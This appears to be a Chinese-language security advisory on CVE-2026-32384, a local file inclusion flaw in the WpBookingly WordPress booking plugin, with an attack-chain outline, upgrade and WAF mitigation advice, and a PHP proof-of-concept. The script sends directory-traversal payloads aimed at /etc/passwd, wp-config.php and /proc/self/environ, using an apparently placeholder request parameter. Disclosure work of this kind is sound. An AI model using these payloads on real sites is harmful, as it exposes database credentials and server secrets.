CVE-2026-32384 CVSS 7.5 高危

CVE-2026-32384 WpBookingly本地文件包含漏洞

披露日期: 2026-03-13

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-32384

漏洞类型

本地文件包含(LFI)

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

magepeopleteam WpBookingly service-booking-manager

漏洞概述

CVE-2026-32384是WordPress插件WpBookingly service-booking-manager中的一个高危安全漏洞，CVSS评分7.5。该漏洞属于PHP本地文件包含(Local File Inclusion, LFI)类型，产生于插件对文件名/路径的验证和控制不足。攻击者可以通过构造恶意请求，利用不安全的文件包含机制读取服务器上的敏感文件，如配置文件(/etc/passwd)、数据库凭证、wp-config.php等。成功利用此漏洞可能导致敏感信息泄露、服务器配置暴露，甚至在特定条件下配合其他漏洞实现远程代码执行。由于该插件在WordPress中被广泛用于服务预订管理，漏洞影响范围较大，建议相关用户立即采取修复措施。

技术细节

该漏洞存在于WpBookingly插件的PHP代码中，由于对include/require语句中使用的文件名参数缺乏充分的输入验证和安全控制。攻击者可以通过HTTP请求参数操控文件路径，利用目录遍历技术(如使用../)访问服务器上的任意文件。典型的攻击场景包括：1) 读取系统敏感文件获取服务器配置信息；2) 读取WordPress配置文件wp-config.php获取数据库凭证和加密密钥；3) 读取其他应用配置文件获取凭据信息。CVSS向量显示攻击复杂度为高(AC:H)，需要低权限用户参与(PR:L)，但无需用户交互(UI:N)。漏洞影响机密性、完整性和可用性三个安全属性，评分均为高(C:H/I:H/A:H)。修复版本为1.2.10，需要从官方渠道获取更新。

攻击链分析

STEP 1

步骤1

识别目标网站使用的WordPress版本及安装的WpBookingly插件版本

STEP 2

步骤2

分析插件代码结构，定位存在文件包含功能的PHP文件

STEP 3

步骤3

构造包含目录遍历序列的恶意请求参数(如../../../../../../etc/passwd)

STEP 4

步骤4

发送恶意请求触发本地文件包含漏洞，读取服务器敏感文件

STEP 5

步骤5

利用获取的敏感信息(如数据库凭证、API密钥)进行进一步攻击或数据窃取

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<?php
// CVE-2026-32384 PoC - WpBookingly Local File Inclusion
// Target: WordPress WpBookingly Plugin <= 1.2.9
// Type: Local File Inclusion via insecure include/require

$target = 'http://target-site.com';
$plugin_path = '/wp-content/plugins/service-booking-manager/';

// Files to test for LFI
$test_files = array(
    '../../../../../../../../etc/passwd',
    '../../../../../../../../wp-config.php',
    '../../../../../../../../../etc/hostname',
    '../../../../../../proc/self/environ'
);

foreach ($test_files as $file) {
    $url = $target . $plugin_path . '?action=some_action&file=' . urlencode($file);
    echo "[*] Testing: $url\n";
    
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_TIMEOUT, 30);
    $response = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    
    if ($http_code == 200 && !empty($response)) {
        echo "[+] Vulnerable! File content:\n";
        echo substr($response, 0, 500) . "\n\n";
    }
}
?>

影响范围

WpBookingly service-booking-manager <= 1.2.9

防御指南

临时缓解措施

立即将WpBookingly插件升级到1.2.10版本；在升级前可临时禁用该插件或使用Web应用防火墙(WAF)规则阻止包含目录遍历字符的请求；加强对WordPress文件和目录的访问控制，限制非授权用户对插件目录的访问权限。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表